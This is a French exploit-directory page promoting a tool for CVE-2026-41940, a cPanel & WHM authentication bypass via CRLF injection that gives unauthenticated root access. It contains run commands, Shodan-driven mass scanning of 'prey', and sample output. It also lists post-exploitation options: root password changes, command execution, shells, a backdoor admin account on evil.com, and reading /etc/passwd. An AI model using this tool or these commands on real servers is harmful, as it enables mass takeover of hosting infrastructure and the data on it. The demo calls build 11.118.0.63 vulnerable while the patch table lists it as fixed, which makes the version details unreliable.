Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41940 — cPanel & WHM - Contournement de l'authentification via injection CRLF dans le fichier de session | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Authentification et AutorisationScanners de VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM - Contournement de l'authentification via injection CRLF dans le fichier de session

Voir le dépôt
1il y a 10h 20mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 CVE-2026-41940 – Contournement d'authentification cPanel & WHM

cPanel

⚡ Root non authentifié – Injection CRLF dans le fichier de session ⚡
« Un seul enchaînement pour tous les gouverner. »

Python License No deps CVSS


🧠 L'exploit en bref

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  Étape 1  ──  Générer un cookie de session pré‑auth        │
│  Étape 2  ──  Injection CRLF via l'en-tête `Authorization` │
│  Étape 3  ──  Déclencher `do_token_denied` (raw → cache)   │
│  Étape 4  ──  Vérifier l'accès root WHM via l'API JSON     │
└─────────────────────────────────────────────────────────────┘

💥 Résultat – Accès root complet à WHM, sans aucune information d'identification.


📜 Licence

Ce projet est publié sous la licence MIT – libre à vous de l'utiliser, de le modifier et de le distribuer, mais ne soyez pas malveillant 😈.
Consultez le fichier LICENSE pour plus de détails.


🛠️ Installation – Littéralement une seule ligne

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

Zéro dépendance – uniquement la bibliothèque standard de Python 3.
Pas besoin de pip, virtualenv ou de tout ce bazar.


🚀 Démarrage rapide – Lancez-le maintenant

Cible unique

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

Analyse massive depuis un fichier

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

Depuis un flux externe (Shodan, subfinder, etc.)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 Options de ligne de commande (le meilleur)


💀 Arsenal de post-exploitation

Une fois la machine compromise, vous pouvez :

  • 🔍 Lister tous les comptes cPanel – --action list
  • 🔑 Changer le mot de passe root – --action passwd --passwd "h4ck3d!"
  • 🖥️ Exécuter des commandes système – --action cmd --cmd "id;whoami"
  • 📡 Shell interactif – --action shell (terminal WHM complet)
  • 👤 Créer un administrateur backdoor – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 Lire des fichiers (via le shell) – cat /etc/passwd
  • 📊 Recueillir des informations sur le serveur – --action info

🧪 Démo – Ce que vous verrez

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  Configuration :
   Cibles   : 1
   Threads  : 10
   Délai    : 15s
   Action   : analyse uniquement

[10:23:15] [SCAN] Démarrage de la chaîne d'exploitation en 4 étapes... https://192.168.1.100:2087
[10:23:15] [INFO] Nom d'hôte canonique découvert : server.example.com
[10:23:15] [STEP] Étape 1/4 — Génération de la session pré‑auth...
[10:23:16] [  OK] Étape 1 : session pré‑auth = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Étape 2/4 — Injection CRLF via l'en-tête Authorization...
[10:23:17] [  OK] Étape 2 : HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Étape 3/4 — Déclenchement du gadget do_token_denied (raw→cache)...
[10:23:18] [  OK] Étape 3 : HTTP 401 — gadget do_token_denied déclenché
[10:23:18] [STEP] Étape 4/4 — Vérification de l'accès root WHM...
[10:23:18] [INFO] Étape 4 : HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMÉ — Accès root WHM ! (v11.118.0.63 — CONFIRMÉ vulnérable)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Session  : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Version  : 11.118.0.63
[10:23:18] [PWND]   URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — Analyse terminée
  Temps : 3,2 s  ·  Cibles : 1

  1 CIBLE VULNÉRABLE(S)

  [*] Cible    : https://192.168.1.100:2087
  [*] Version  : 11.118.0.63
  [*] Token    : /cpsess1234567890
  [*] URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Session  : 9a7f8e3d2c1b0a9f
  [*] Preuve   : {"version":"11.118.0.63",...}

🔎 Dorks Shodan (trouvez votre proie)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 Versions concernées – État des correctifs

Toutes les versions inférieures à ces builds sont vulnérables.


🕵️‍♂️ Auteur & Crédits

0xgh057r3c0n – chercheur en sécurité, ingénieur en rétro-ingénierie et accro au café.
GitHub | Twitter


⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.
L'accès non autorisé à des systèmes informatiques est illégal. L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce logiciel.
Utilisez-le de manière responsable et obtenez toujours une autorisation au préalable.


🌟 Support / Contribution

  • Vous avez trouvé un bug ? Ouvrez une issue.
  • Vous souhaitez améliorer le code ? Les PR sont les bienvenues.
  • L'outil vous a plu ? Mettez-lui une ⭐ sur GitHub !

🔥 Piratez la planète, mais restez dans la légalité. 🔥

Télécharger l’outil
OptionDescription
-u, --urlURL de la cible unique (ex. https://host:2087)
-l, --listFichier contenant une URL par ligne
--hostnameRemplacer le nom d'hôte canonique de l'en-tête Host (découverte automatique)
-t, --threadsNombre de threads (défaut : 10)
--timeoutDélai d'expiration en secondes (défaut : 15)
--rate-limitPause entre les cibles (secondes)
--actionPost-exploitation : list, passwd, cmd, exec, info, version, shell, adduser
--passwdNouveau mot de passe root (avec --action passwd)
--cmdCommande système (avec --action cmd/exec)
--new-userNouveau nom d'utilisateur cPanel (avec --action adduser)
--new-domainNouveau domaine cPanel (avec --action adduser)
-o, --outputEnregistrer les résultats au format JSON
BrancheBuild corrigéStatut
11.11011.110.0.97🛡️ Corrigé
11.11811.118.0.63🛡️ Corrigé
11.12611.126.0.54🛡️ Corrigé
11.13211.132.0.29🛡️ Corrigé
11.13411.134.0.20🛡️ Corrigé
11.13611.136.0.5🛡️ Corrigé